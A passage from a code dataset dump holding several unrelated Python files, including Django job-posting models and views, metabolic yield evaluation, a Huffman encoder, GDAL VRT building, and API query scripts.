related_name='capacity_group_head')\n\n def __str__(self):\n return self.ShortName\n\n def clean(self):\n # self.Info = clean_text(self.Info)\n self.FullName = clean_text(self.FullName)\n self.ShortName = clean_text(self.ShortName)\n\n\nclass GroupAdministratorThrough(models.Model):\n \"\"\"\n Through-model between User and CapacityGroup to store read/write access as groupadministrator\n Called via CapacityGroup.Administrators\n \"\"\"\n Group = models.ForeignKey(CapacityGroup, on_delete=models.CASCADE)\n User = models.ForeignKey(User, on_delete=models.CASCADE, related_name='administratoredgroups')\n Super = models.BooleanField(default=False, blank=True)\n\n\nclass MailTemplate(models.Model):\n \"\"\"\n Template for a mailing list mail\n \"\"\"\n RecipientsStudents = models.CharField(max_length=400)\n RecipientsStaff = models.CharField(max_length=400)\n Subject = models.CharField(max_length=400)\n Message = models.TextField()\n TimeStamp = models.DateTimeField(auto_now=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, null=True)\n\n def RecipientsStudentsList(self):\n return [dict(mail_student_options).get(a) for a in json.loads(self.RecipientsStudents)]\n\n def RecipientsStaffList(self):\n return [dict(mail_staff_options).get(a) for a in json.loads(self.RecipientsStaff)]\n\n def __str__(self):\n return '{} at {}'.format(self.Subject, self.TimeStamp)\n\n\nclass Mailing(models.Model):\n \"\"\"\n A mailing sent using the system.\n \"\"\"\n RecipientsStaff = models.ManyToManyField(User, related_name='received_mailings_staff', default=None, blank=True)\n RecipientsStudents = models.ManyToManyField(User, related_name='received_mailings_students', default=None, blank=True)\n Subject = models.CharField(max_length=400)\n Message = models.TextField()\n Sent = models.BooleanField(default=False)\n TimeStamp = models.DateTimeField(auto_now=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, null=True)\n\n def __str__(self):\n return '{} at {} (sent:{})'.format(self.Subject, self.TimeStamp, self.Sent)\n\n\nclass PublicFile(models.Model):\n \"\"\"\n Public file. Support staff can upload these and the files are shown for each user on the frontpage.\n \"\"\"\n\n def make_upload_path(instance, filename):\n \"\"\"\n Upload path for a public file. Stored in /media/public_files/{timeslot-id}/{uuid.ext}\n\n :param filename:\n :return:\n \"\"\"\n filename_new = filename_default(filename)\n return 'public_files/{0}/{1}'.format(str(get_timeslot().id), filename_new)\n\n Caption = models.CharField(max_length=200, blank=True, null=True)\n OriginalName = models.CharField(max_length=200, blank=True, null=True)\n File = models.FileField(default=None, upload_to=make_upload_path)\n TimeSlot = models.ForeignKey(TimeSlot, default=get_timeslot_id, on_delete=models.CASCADE,\n related_name='public_files')\n User = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE)\n TimeStamp = models.DateTimeField(auto_now=True, blank=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n\n def metro_icon(self):\n return metro_icon_default(self)\n\n def __str__(self):\n return str(self.OriginalName) + \" - \" + str(self.Caption)\n\n def save(self, *args, **kwargs):\n # remove old file if this is a changed file\n try:\n this_old = PublicFile.objects.get(id=self.id)\n if this_old.File != self.File:\n this_old.File.delete(save=False)\n except PublicFile.DoesNotExist: # new image object\n pass\n super(PublicFile, self).save(*args, **kwargs)\n\n def clean(self):\n self.Caption = clean_text(self.Caption)\n if self.File:\n if get_ext(self.File.name) not in settings.ALLOWED_PUBLIC_FILES:\n raise ValidationError(\n 'This file type is not allowed. Allowed types: ' + print_list(settings.ALLOWED_PUBLIC_FILES))\n\n\n@receiver(pre_delete, sender=PublicFile)\ndef public_file_delete(sender, instance, **kwargs):\n \"\"\"\n Delete actual file if publicfile Object is removed\n\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n file_delete_default(sender, instance)\n","sub_path":"support/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"407144299","text":"# Copyright 2019 Novo Nordisk Foundation Center for Biosustainability,\n# Technical University of Denmark.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"Evaluate production levels and yields.\"\"\"\n\n\nimport logging\nfrom typing import Optional, Tuple\n\nimport cobra\nfrom cameo.strain_design.heuristic.evolutionary.objective_functions import (\n biomass_product_coupled_yield,\n product_yield,\n)\nfrom cobra.exceptions import OptimizationError\nfrom cobra.flux_analysis import pfba\nfrom cobra.flux_analysis.phenotype_phase_plane import (\n reaction_elements,\n reaction_weight,\n total_yield,\n)\nfrom numpy import isnan\n\n\n__all__ = (\"evaluate_production\", \"evaluate_biomass_coupled_production\")\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef evaluate_production(\n model: cobra.Model, production_id: str, carbon_source_id: str\n) -> Tuple[Optional[float], Optional[float], Optional[float], Optional[float]]:\n \"\"\"\n Evaluate the production levels in the specific model conditions.\n\n Warnings\n --------\n This function is expected to be called within a context since it modifies\n the model's objective.\n\n Parameters\n ----------\n model : cobra.Model\n The constraint-based metabolic model of the production organism.\n production_id : str\n The identifier of the reaction representing production, for example,\n a demand reaction on the compound.\n carbon_source_id : str\n The identifier of the reaction representing carbon uptake, for example,\n a glucose exchange reaction.\n\n Returns\n -------\n tuple\n float or None\n The theoretical maximum production rate if any.\n float or None\n The maximal product flux yield if any.\n float or None\n The maximal product carbon yield if any.\n float or None\n The maximal product yield by weight if any.\n\n \"\"\"\n pyield = product_yield(production_id, carbon_source_id)\n # Compute the number of weighted carbon atoms.\n carbon_uptake = model.reactions.get_by_id(carbon_source_id)\n production = model.reactions.get_by_id(production_id)\n input_components = [reaction_elements(carbon_uptake)]\n output_components = reaction_elements(production)\n # Compute the masses.\n try:\n input_weights = [reaction_weight(carbon_uptake)]\n output_weight = reaction_weight(production)\n # If the reactions are ill-defined or the metabolite weight is unknown.\n except (ValueError, TypeError):\n input_weights = []\n output_weight = []\n try:\n model.objective = production_id\n solution = model.optimize()\n production_flux = solution[production_id]\n except OptimizationError as error:\n logger.error(\n \"Could not determine production due to a solver error. %r\", error\n )\n production_flux = None\n production_flux_yield = None\n production_carbon_yield = None\n production_mass_yield = None\n else:\n try:\n production_flux_yield = pyield(model, solution, None)\n except ZeroDivisionError:\n logger.error(\"Division by zero in yield calculation.\")\n production_flux_yield = None\n production_carbon_yield = total_yield(\n [solution[carbon_source_id]],\n input_components,\n solution[production_id],\n output_components,\n )\n if isnan(production_carbon_yield):\n production_carbon_yield = None\n production_mass_yield = total_yield(\n [solution[carbon_source_id]],\n input_weights,\n solution[production_id],\n output_weight,\n )\n if isnan(production_mass_yield):\n production_mass_yield = None\n\n return (\n production_flux,\n production_flux_yield,\n production_carbon_yield,\n production_mass_yield,\n )\n\n\ndef evaluate_biomass_coupled_production(\n model: cobra.Model,\n production_id: str,\n biomass_id: str,\n carbon_source_id: str,\n) -> Tuple[Optional[float], Optional[float]]:\n \"\"\"\n Evaluate the biomass coupled production levels in the specific conditions.\n\n Warnings\n --------\n This function is expected to be called within a context since it modifies\n the model's objective.\n\n Parameters\n ----------\n model : cobra.Model\n The constraint-based metabolic model of the production organism.\n production_id : str\n The identifier of the reaction representing production, for example,\n a demand reaction on the compound.\n biomass_id : str\n The identifier of the reaction representing biomass accumulation, i.e.,\n growth.\n carbon_source_id : str\n The identifier of the reaction representing carbon uptake, for example,\n a glucose exchange reaction.\n\n Returns\n -------\n tuple\n float or None\n The theoretical maximum growth rate if any.\n float or None\n The maximum biomass coupled product yield if any.\n\n \"\"\"\n bpcy = biomass_product_coupled_yield(\n biomass_id, production_id, carbon_source_id\n )\n try:\n model.objective = biomass_id\n solution = pfba(model)\n growth = solution[biomass_id]\n except OptimizationError as error:\n logger.error(\n \"Could not determine biomass coupled production due to a solver \"\n \"error. %r\",\n error,\n )\n growth = None\n bpc_yield = None\n else:\n try:\n bpc_yield = bpcy(model, solution, None)\n except ZeroDivisionError:\n logger.error(\"Division by zero in yield calculation.\")\n bpc_yield = None\n return growth, bpc_yield\n","sub_path":"src/metabolic_ninja/worker/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"370375590","text":"import argparse\nfrom app.file_sentiment_extractor import FileSentimentExtractor\n\n\"\"\"\nExample:\npython features.py --hotel-data \"datasets/Tripadvisor Review Part1.xlsx\" --save\n\"\"\"\n\nparser = argparse.ArgumentParser()\n#parser.add_argument('--crime-data', metavar='C', nargs='?')\nparser.add_argument('--hotel-data', metavar='H', nargs='?')\nparser.add_argument('--save', action='store', const=True, nargs='?')\n\nargs = parser.parse_args()\n\noutput_file = args.save if args.save else False\n\nif args.hotel_data:\n sent_ext = FileSentimentExtractor()\n sent_ext.process_file(args.hotel_data, output_file)\nelse:\n print(\"Nothing to do\")\n ","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"261799280","text":"import pytest\n\nimport algorithms.online.geeks.even_odd as seg\n\n\n@pytest.mark.math\n@pytest.mark.array\nclass TestEvenOdd:\n @staticmethod\n def verify(arr):\n lo = 0\n hi = len(arr) - 1\n while arr[lo] % 2 == 0 and lo < hi:\n if arr[lo + 1] % 2 == 1:\n break\n lo += 1\n while arr[hi] % 2 == 1 and lo < hi:\n if arr[hi - 1] % 2 == 0:\n break\n hi -= 1\n assert 0 <= hi - lo <= 1\n\n def test_even_odd_sample(self):\n arr = [12, 34, 45, 9, 8, 90, 3]\n result = seg.even_odd(arr)\n self.verify(result)\n\n def test_even_odd_zigzag(self):\n arr = [1, 2, 3, 4, 5, 6]\n result = seg.even_odd(arr)\n self.verify(result)\n\n def test_even_odd_done(self):\n arr = [2, 4, 1, 3]\n result = seg.even_odd(arr)\n self.verify(result)\n\n def test_even_odd_done_all_odd(self):\n arr = [1, 3, 5, 7]\n result = seg.even_odd(arr)\n self.verify(result)\n\n def test_even_odd_done_all_even(self):\n arr = [2, 4, 6, 8]\n result = seg.even_odd(arr)\n self.verify(result)\n","sub_path":"tests/online/geeks/test_even_odd.py","file_name":"test_even_odd.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"477250273","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport threading\nimport time\nimport queue\n\nclass myThread (threading.Thread): #继承父类threading.Thread\n def __init__(self, threadID, name, queue):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.queue = queue\n def run(self): #把要执行的代码写到run函数里面 线程在创建后会直接运行run函数\n print(\"Starting \" + self.name)\n while True:\n item = q.get()\n print(self.name + \"get \" + str(item))\n q.task_done()\n print(\"Exiting \" + self.name)\n\nq = queue.Queue()\n\n# 创建线程池\nfor i in range(10):\n t = myThread(1, \"Thread-%s\"%i, q)\n t.daemon = True\n t.start()\n\nfor item in range(1000):\n q.put(item)\nq.join()\nprint(\"Exiting Main Thread\")\n","sub_path":"basic/languages/python-19910220/lib-ref/17-cocurrent-execution/threadpool.py","file_name":"threadpool.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"424026124","text":"import sys\nimport requests\n\ndeps=list(map(lambda x:\"{:02}\".format(x),range(1,96)))\ndeps[19:20]=[\"2A\",\"2B\"]\nfirst=True\nfor dep in deps:\n print(dep,file=sys.stderr)\n params={'num_departement':dep,'size':'20000'}\n res=requests.get(\"http://hubeau.eaufrance.fr/api/v1/qualite_nappes/stations.csv\",params=params)\n if res.status_code==requests.codes.ok:\n if first:\n print(res.text,end='')\n first=False\n else:\n content=res.text\n print(content[content.find('\\n')+1:],end='')\n else:\n print('Erreur {} dans \"{}\"'.format(res.status_code,res.url),file=sys.stderr)\n","sub_path":"get_ades_bss.py","file_name":"get_ades_bss.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166078685","text":"import os\nimport argparse\n\n\ndef get_integration_years():\n\n years = range(2010, 2018)\n\n return years\n\ndef vrt_integration(pathInput, pathOutput):\n\n integrationYears = get_integration_years()\n\n bands = range(0,len(integrationYears))\n\n for band in bands:\n\n pathImageInput = pathInput + '/*.tif'\n pathImageOutput = pathOutput + \"/INTEGRACAO_\" + str(integrationYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -b ' + str(band + 1) + \" \" + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\ndef get_transition_years():\n transition_years = [ u'1985_1986', u'1986_1987', u'1987_1988', u'1988_1989', u'1989_1990', u'1990_1991',\n u'1991_1992', u'1992_1993', u'1993_1994', u'1994_1995', u'1995_1996', u'1996_1997', \n u'1997_1998', u'1998_1999', u'1999_2000', u'2000_2001', u'2001_2002', u'2002_2003', \n u'2003_2004', u'2004_2005', u'2005_2006', u'2006_2007', u'2007_2008', u'2008_2009', \n u'2009_2010', u'2010_2011', u'2011_2012', u'2012_2013', u'2013_2014', u'2014_2015', \n u'2015_2016', u'2016_2017', u'1985_1990', u'1990_1995', u'1995_2000', u'2000_2005', \n u'2005_2010', u'2010_2015', u'2015_2017', u'1990_2000', u'2000_2010', u'2010_2017', \n u'1985_2017', u'2008_2017', u'2012_2017', u'1994_2002', u'2002_2010', u'2010_2016']\n\n return transition_years\n\ndef vrt_transition(pathInput, pathOutput):\n\n transitionYears = get_transition_years()\n\n bands = range(0, len(get_transition_years()))\n\n for band in bands:\n\n pathImageInput = pathInput + '/*.tif'\n pathImageOutput = pathOutput + \"/TRANSICAO_\" + str(transitionYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -b ' + str(band + 1) + \" \" + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\n\ndef vrt_rgb(pathInput, pathOutput):\n\n integrationYears = get_integration_years()\n\n bands = range(0,33)\n\n for band in bands:\n year = str(integrationYears[band])\n pathImageInput = pathInput + '/mosaic-rgb-collection3-' + year + '*.tif'\n pathImageOutput = pathOutput + \"/RGB_\" + str(integrationYears[band]) + '.vrt'\n\n osCommand = 'gdalbuildvrt -allow_projection_difference -overwrite ' + \\\n pathImageOutput + \" \" + pathImageInput\n\n print(osCommand)\n os.system(osCommand)\n\n\n\ndef interface():\n\n parser = argparse.ArgumentParser(description='Create VRT')\n\n parser.add_argument('colecao', type=str, default='integracao', help='choose which collection', \n choices=['integracao', 'transicao', 'rgb'])\n\n parser.add_argument('dir_src', type=str, help='the source folder')\n\n parser.add_argument('dir_dst', type=str, help='the destination folder')\n \n colecao = parser.parse_args().colecao\n dir_src = parser.parse_args().dir_src\n dir_dst = parser.parse_args().dir_dst\n\n if colecao == \"integracao\":\n vrt_integration(dir_src, dir_dst)\n\n if colecao == 'transicao':\n vrt_transition(dir_src, dir_dst)\n\n if colecao == 'rgb':\n vrt_rgb(dir_src, dir_dst)\n\n\nif __name__ == \"__main__\":\n interface()\n\n","sub_path":"images/buildvrt_util.py","file_name":"buildvrt_util.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"417178459","text":"class Node:\n def __init__(self,symbol, weight, left = None, right = None):\n self.symbol = symbol\n self.left = left\n self.right = right\n self.weight = weight\n def children(self):\n return (self.left, self.right)\n def __str__(self):\n return '%s_%s' % (self.left, self.right)\n\n \n def preorder_traversal(self, path = '', codes = {}): #depth traversal, preorder traversal\n #\n if self.left == None:\n codes[self.symbol] = path\n else:\n self.left.preorder_traversal(path+'0', codes)\n self.right.preorder_traversal(path + '1', codes)\n return codes\n\ndef sort_by_weigth(node: Node):\n return (node.weight * 10000000 + ord(node.symbol[0]))\n\n\nclass huffman:\n def __init__(self, tree = None, source = None):\n None\n def gen_tree(self, source):\n freq = self.get_freq(source)\n print(freq)\n tree = [] # list of node with wight = freq\n for sym in freq.keys():\n tree.append(Node(sym, freq[sym]))\n tree.sort(key = sort_by_weigth)\n while len(tree)>1:\n l = tree.pop(0)\n r = tree.pop(0)\n new_node = Node(l.symbol + r.symbol,l.weight + r.weight, l,r)\n tree.append(new_node)\n tree.sort(key = sort_by_weigth) \n return tree\n\n def encode(self, source , tree = None):\n if not tree:\n self.tree = self.gen_tree(source)\n else:\n self.tree = tree\n self.codes = self.tree[0].preorder_traversal()\n print(self.codes)\n encoded = ''\n for sym in source:\n encoded += self.codes[sym]\n return encoded\n def get_freq(self,string):\n #creates a dictionary with key beeingn each symbol and value the freq\n symbols = {}\n for sym in string:\n symbols[sym] = symbols.get(sym,0)+1\n return symbols\n\nh = huffman().encode(\"lossless compression\")\nprint(h)\n","sub_path":"data_compression/huffman_py/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"542265581","text":"import requests\n# developer_key for google api\nApi_Key = \"**********\"\n\n\"\"\"\n Description:\n Search and return the list of videos by specified key.\n Parameters:\n - key title of the video you want\n - max_result max number of result returned every time\n - order \n https://developers.google.com/apis-explorer/#p/youtube/v3/youtube.search.list\n - date\n - rating\n - relevance\n - title\n - videoCount\n - viewCount\n\"\"\"\ndef searchVideosByKey(key, max_result = 25,order = \"relevance\",page_token = \"\"):\n logUrl = 'https://www.googleapis.com/youtube/v3/search'\n parms = {\n \"part\": \"snippet\",\n \"maxResult\": max_result,\n \"q\":key,\n \"key\": Api_Key,\n \"order\": order\n }\n if page_token != \"\":\n parms[\"pageToken\"] = page_token\n re = requests.get(logUrl, parms)\n return re\n\n\"\"\"\n Description:\n Get the list of comment threads in a video. Each thread contains a top comment and 0 or more replies.\n Note: this function just return the top comments.\n Parameters:\n - video_id the id of the video, you can find it in the url address or search the video by using function searchVideosByKey()\n\"\"\"\ndef commentThreads(video_id):\n logUrl ='https://www.googleapis.com/youtube/v3/commentThreads'\n parms = {\n \"part\":\"snippet\",\n \"videoId\": video_id,\n \"key\":Api_Key\n }\n re = requests.get(logUrl,parms)\n return re\n\n\"\"\"\n Description:\n Get the statistics of the specified video:\n - viewCount\n - likeCount\n - dislikeCount\n - favoriteCount\n - commentCount\n Parameters:\n - id the id of the video, you can find it in the url address or search the video by using function searchVideosByKey()\n\"\"\"\ndef videoStatistics(video_id):\n logUrl = 'https://www.googleapis.com/youtube/v3/videos'\n parms = {\n \"part\": \"statistics\",\n \"id\": video_id,\n \"key\": Api_Key\n }\n re = requests.get(logUrl, parms)\n return re\n\n# test stub\nif __name__ == '__main__':\n print()\n # result1 = searchVideosByKey(\"Syracuse University\")\n # print(result1.text)\n # result2 = commentThreads(\"6XFOou8Uq6c\")\n # print(result2.text)\n result3 = videoStatistics(\"LUlNcT9v3no\")\n print(result3.text)\n","sub_path":"youtubeApi.py","file_name":"youtubeApi.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568557448","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 15 08:31:37 2021\r\n\r\n@author: oislen\r\n\"\"\"\r\n\r\n\r\ndef extract_model_cols(dataset):\r\n \"\"\"\r\n\r\n Extract Model Columns Documentation\r\n\r\n Function Overview\r\n\r\n This function splits up the columns of a given modeling dataset into index columns, target columns, excluded columns and predictor columns.\r\n The results are returned as arrays within a python dictionary.\r\n\r\n Defaults\r\n\r\n extract_model_cols(dataset)\r\n\r\n Parameters\r\n\r\n dataset - DataFrame, the modelling dataset to extract the various columns from.\r\n\r\n Returns\r\n\r\n model_cols_dict - Dictionary, the extract columnsstored within arrays\r\n\r\n Example\r\n\r\n extract_model_cols(dataset = base)\r\n\r\n \"\"\"\r\n\r\n print('extracting out dataset columns ...')\r\n\r\n # extract the dataset columns\r\n data_cols = dataset.columns.tolist()\r\n\r\n # seperate out the index, target and predictor columns\r\n index_cols = ['primary_key',\r\n 'ID',\r\n 'data_split',\r\n 'meta_level',\r\n 'holdout_subset_ind',\r\n 'no_sales_hist_ind',\r\n 'no_holdout_sales_hist_ind',\r\n 'year',\r\n 'month',\r\n 'date_block_num',\r\n 'shop_id',\r\n 'item_id',\r\n 'item_cat_id',\r\n 'item_category_id',\r\n 'item_cat_sub_id'\r\n ]\r\n\r\n tar_cols = ['item_cnt_day']\r\n\r\n # the columns below contain information which would forward bias the results (data leakage from target)\r\n forward_bias_cols = ['shop_id_total_item_cnt_day',\r\n 'item_id_total_item_cnt_day',\r\n 'item_category_id_total_item_cnt_day',\r\n 'shop_id_item_category_id_total_item_cnt_day',\r\n 'city_enc_total_item_cnt_day',\r\n 'item_id_city_enc_total_item_cnt_day'\r\n ]\r\n\r\n # the columns below don't add much intrinsic value\r\n useless_cols = ['year_mean_enc',\r\n 'month_mean_enc',\r\n 'date_block_num_mean_enc',\r\n 'days_of_month',\r\n 'city_enc'\r\n ]\r\n\r\n # combine all columns to ignore\r\n excl_cols = index_cols + tar_cols + forward_bias_cols + useless_cols\r\n\r\n # extract the predictor columns which are not an element of index, target or exlusion columns\r\n pred_cols = [col for col in data_cols if col not in excl_cols]\r\n\r\n # create a dictionary of the output columns\r\n model_cols_dict = {'index_cols': index_cols,\r\n 'tar_cols': tar_cols,\r\n 'excl_cols': excl_cols,\r\n 'pred_cols': pred_cols\r\n }\r\n\r\n return model_cols_dict\r\n","sub_path":"competitions/Predict_Future_Sales/scripts/02_prg_run_meta_level_I/reference/extract_model_cols.py","file_name":"extract_model_cols.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"577820467","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import FormularioAnuncio, FormularioModificarAnuncio, FormularioPersona, FormularioModificarPersona, FormularioPostulacion,FormularioModificarPostulacion\nfrom apps.modelo.models import Persona, Anuncio, Postulacion\nfrom django.contrib import messages\n\n\n@login_required\ndef principal(request):\n\tusuario = request.user #Petición que es procesada por el framework y obtiene el usuario \n\treturn render(request,'pagina_principal_sesion_iniciada.html')\n\ndef registrar_persona(request):\n\tformulario = FormularioPersona(request.POST)\n\tif request.method == 'POST':\n\t\tif formulario.is_valid():\n\t\t\t#Persona\n\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\tpersona=Persona() #Crea un objeto de la case Persona\n\t\t\tpersona.nombres=datos.get('nombres')\n\t\t\tpersona.apellidos=datos.get('apellidos')\n\t\t\tpersona.fecha_nacimiento=datos.get('fecha_nacimiento')\n\t\t\tpersona.correo=datos.get('correo')\n\t\t\tpersona.celular=datos.get('celular')\n\t\t\tpersona.save()\n\t\t\tmensaje = 'Se ha registrado correctamente'\n\t\t\tcolor = 'success'\n\t\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje,\n\t\t\t\t'color': color,\n\t\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t\t}\n\t\t\treturn render (request, 'status.html',context)\n\tcontext = {\n\t\t'formulario': formulario\n\t}\n\treturn render(request, 'persona/registrar_persona.html', context)\n\n@login_required\ndef mostrar_anuncios(request):\n\tusuario = request.user #Petición que es procesada por el framework y obtiene el usuario \n\tif usuario!='null':\n\t\tlista=Anuncio.objects.all()\n\t\tcontext={\n\t\t\t'lista': lista,\n\t\t}\n\t\treturn render(request,'anuncio/anuncios.html', context)\n\telse:\n\t\tmensaje = 'No ha iniciado sesión aún'\n\t\tcolor = 'danger'\n\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\tcontext = {\n\t\t\t'mensaje': mensaje,\n\t\t\t'color': color,\n\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t}\n\t\treturn render(request,'status.html', context)\n\n@login_required\ndef ver_postulaciones(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tcodigo = request.GET['codigo']\n\t\tanuncio=Anuncio.objects.get(anuncio_id=codigo)\n\t\tlista = Postulacion.objects.filter(anuncio_id = codigo)\n\t\tcontext={\n\t\t\t'lista': lista,\n\t\t\t'anuncio': anuncio.titulo,\n\t\t}\n\t\treturn render(request,'postulacion/postulaciones.html', context)\n\telse:\n\t\tmensaje = 'No ha iniciado sesión aún'\n\t\tcolor = 'danger'\n\t\tmensaje_adicional='Porfavor inicie sesión'\n\t\tcontext = {\n\t\t\t'mensaje': mensaje,\n\t\t\t'color': color,\n\t\t\t'mensaje_adicional': mensaje_adicional,\n\t\t}\n\t\treturn render(request,'status.html', context)\t\t\n\n@login_required\ndef buscar_anuncios(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tconsulta = request.GET['consulta']\n\t\tlista=Anuncio.objects.filter(titulo__contains=consulta).order_by('titulo')\t\n\t\tif lista=='null':\n\t\t\tcontext={\n\t\t\t\t'mensaje': 'Lo sentimos, aún no hay empleos disponibles para ese campo',\n\t\t\t\t'color':'danger',\n\t\t\t}\n\t\telse:\t\n\t\t\tcontext={\n\t\t\t\t'lista': lista\n\t\t\t}\n\t\treturn render(request,'anuncio/anuncios.html', context)\n\n@login_required\ndef crear_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\n\t\tformulario = FormularioAnuncio(request.POST)\n\t\tcelu = request.GET['celular']\n\t\tpersona = Persona.objects.get(celular = celu)\n\t\tif request.method == 'POST':\n\t\t\tif formulario.is_valid():\n\t\t\t\t#Persona\n\t\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\t\tanuncio=Anuncio() #Crea un objeto de la case Persona\n\t\t\t\tanuncio.titulo=datos.get('titulo')\n\t\t\t\tanuncio.puesto=datos.get('puesto')\n\t\t\t\tanuncio.descripcion=datos.get('descripcion')\n\t\t\t\tanuncio.area=datos.get('area')\n\t\t\t\tanuncio.pais='Ecuador'\n\t\t\t\tanuncio.provincia=datos.get('provincia')\n\t\t\t\tanuncio.ciudad=datos.get('ciudad')\n\t\t\t\tanuncio.direccion=datos.get('direccion')\n\t\t\t\tanuncio.persona=persona\n\t\t\t\tanuncio.save()\n\t\t\t\tmensaje = 'Se ha creado el anuncio correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\tcontext = {\n\t\t\t'formulario': formulario\n\t\t}\n\t\treturn render(request, 'anuncio/crear_anuncio.html', context)\n\n\n@login_required\ndef modificar_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tanuncio_id = request.GET['id']\n\t\tanuncio = Anuncio.objects.get(anuncio_id = anuncio_id)\n\t\tif request.method == 'POST':\n\t\t\tformulario=FormularioModificarAnuncio(request.POST)\n\t\t\tif formulario.is_valid():\n\t\t\t\tdatos=formulario.cleaned_data\n\t\t\t\tanuncio.titulo=datos.get('titulo')\n\t\t\t\tanuncio.puesto=datos.get('puesto')\n\t\t\t\tanuncio.descripcion=datos.get('descripcion')\n\t\t\t\tanuncio.area=datos.get('area')\n\t\t\t\tanuncio.pais='Ecuador'\n\t\t\t\tanuncio.provincia=datos.get('provincia')\n\t\t\t\tanuncio.ciudad=datos.get('ciudad')\n\t\t\t\tanuncio.direccion=datos.get('direccion')\n\t\t\t\tanuncio.save()\n\t\t\t\tmensaje = 'Se ha modificado el anuncio correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\telse:\n\t\t\tformulario=FormularioModificarAnuncio(instance = anuncio)\n\t\t\tcontext = {\n\t\t\t\t'anuncio': anuncio,\n\t\t\t\t'formulario': formulario,\n\t\t\t}\n\t\t\treturn render(request, 'anuncio/modificar_anuncio.html', context)\t\t\n\n\n@login_required\ndef eliminar_anuncio(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tformulario = FormularioAnuncio(request.POST)\n\t\tanuncio_id = request.GET['id']\n\t\tanuncio = Anuncio.objects.get(anuncio_id = anuncio_id)\n\t\tanuncio.delete()\n\t\tmensaje = 'Se ha eliminado el anuncio correctamente'\n\t\tcontext = {\n\t\t'mensaje': mensaje\n\t\t}\n\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\n\n@login_required\ndef postular(request):\n\tusuario = request.user\n\tif usuario!='null':\t\n\t\tformulario = FormularioPostulacion(request.POST)\n\t\tcelu = request.GET['celular']\n\t\tpersona = Persona.objects.get(celular = celu)\n\t\tif request.method == 'POST':\n\t\t\tid_a=request.GET['id']\n\t\t\tanuncio = Anuncio.objects.get(anuncio_id=id_a)\n\t\t\tif formulario.is_valid():\n\t\t\t\t#Persona\n\t\t\t\tdatos=formulario.cleaned_data #Obtener todos los datos del formulario\n\t\t\t\tpostulacion=Postulacion() #Crea un objeto de la case Persona\n\t\t\t\tpostulacion.salario=datos.get('salario')\n\t\t\t\tpostulacion.mensaje=datos.get('mensaje')\n\t\t\t\tpostulacion.persona=persona\n\t\t\t\tpostulacion.anuncio=anuncio\n\t\t\t\tpostulacion.save()\n\t\t\t\tmensaje = 'Se ha postulado correctamente'\n\t\t\t\tcontext = {\n\t\t\t\t'mensaje': mensaje\n\t\t\t\t}\n\t\t\t\treturn render (request, 'anuncio/status_anuncio.html',context)\n\t\tcontext = 